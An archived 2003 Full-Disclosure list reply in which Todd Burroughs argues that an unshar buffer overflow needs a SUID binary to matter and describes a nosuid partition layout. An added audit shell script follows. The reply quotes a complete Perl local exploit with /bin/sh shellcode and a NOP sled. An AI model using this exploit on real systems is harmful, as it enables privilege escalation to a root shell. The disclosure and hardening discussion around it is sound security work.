Message-ID: <Pine.LNX.4.58.0312040220020.7596@suse.bluegenesis.com>
From: todd at hostopia.com (Todd Burroughs)
Subject: flames security group start to play , yet
 another vuln found (rustymemory and welshboi)

This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.

You shouldn't have much on your system that is SUID root.  I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job,
after that you will need to add whatever you need to the security.local
file, depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes it easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 3 Dec 2003, KF wrote:

> if you are bored .... download unrar.
> -KF
>
>
> rustymemory wrote:
>
> >By: flames.bluefox.net.nz
> >if unshar suid; then you w00t
> >
> >proof of concept?
> >
> >rustymemory@...mes:~$ unshar -f `perl -e 'print"A"x2000'`
> >............................AAAAAAAAAAAAAASegmentation fault
> >
> >welshboi@...mes:~$ more unshar.pl
> >#!/usr/bin/perl
> >#/usr/bin/unshar local sploit.
> >#coded by welshboi (deadbeat)
> >#found by rustymemory
> >#
> >#FLAMES SECURITY GROUP
> >#Private, please dont distribute
> >#affects all linux distributions , tested on slackware 9.1 and MDK
> >###############################################
> >#[deadbeat@...achu sploits]$ perl unshar.pl #
> ># #
> >#[] /usr/bin/unshar exploit #
> >#[] coded by: deadbeat [] #
> >#[] found by: rustymemory [] #
> >#_f1GWugHu[SPZ #
> ># #
> >#sh-2.05b$ #
> >###############################################
> ># 47byte shellcode (exec /bin/sh)
> >$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
> >"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
> >"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
> >"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
> >$egg = 2000;
> >$buf = 1128;
> >$nop = "\x90";
> >$offset = 0;
> >$ret =0x40055bdc;
> >if(@ARGV == 1) {$offset = $ARGV[0];}
> >$addr = pack('l', ($ret + $offset));
> >for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
> >for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
> >$evil .= $hell;
> >print "\n[] /usr/bin/unshar exploit []\n";
> >print "[] coded by: deadbeat, uk2sec []\n";
> >print "[] found by: rustymemory []\n\n";
> >print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
> >system("/usr/bin/unshar -f $evil");
> >
> >---------------------------------------------------------
> >shouts to ?
> >
> >calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest
> >of flames security group. and rusty's fiancee
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
>
>
>
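
The audit Todd describes in his reply (run mount, confirm everything except the "suid partition" is mounted nosuid, then look at that partition), written out as an added shell example that is not part of the original message. The `/suid` mount point and the sample mount table are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit a "suid partition" layout as described in the message.

# Read a /proc/mounts-format table on stdin and print every mount point that
# lacks the nosuid option, skipping the single mount point ($1) that is
# allowed to carry SUID/SGID binaries.
mounts_missing_nosuid() {
    awk -v allowed="$1" '
        $2 == allowed { next }
        {
            n = split($4, opts, ",")
            ok = 0
            for (i = 1; i <= n; i++) if (opts[i] == "nosuid") ok = 1
            if (!ok) print $2
        }'
}

# List SUID or SGID regular files under a directory without crossing into
# other filesystems, so the output reflects that partition only.
list_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Constructed sample (device, mount point, type, options, dump, pass).
# /suid is the hypothetical small partition; /tmp was left without nosuid.
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,nosuid 0 0
/dev/sda2 /suid ext3 rw,nodev 0 0
/dev/sda3 /home ext3 rw,nosuid,nodev 0 0
/dev/sda4 /tmp ext3 rw,nodev 0 0'

# Run the mount check over the constructed table.
audit_sample() {
    printf '%s\n' "$SAMPLE_MOUNTS" | mounts_missing_nosuid /suid
}

audit_sample

# On a live system (assuming the partition is mounted at /suid):
#   mounts_missing_nosuid /suid < /proc/mounts
#   list_suid_sgid /suid
```

Any mount point printed by the first function is a filesystem where a SUID binary would still be honoured; the second function gives the complete inventory to review on the one partition that permits them.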

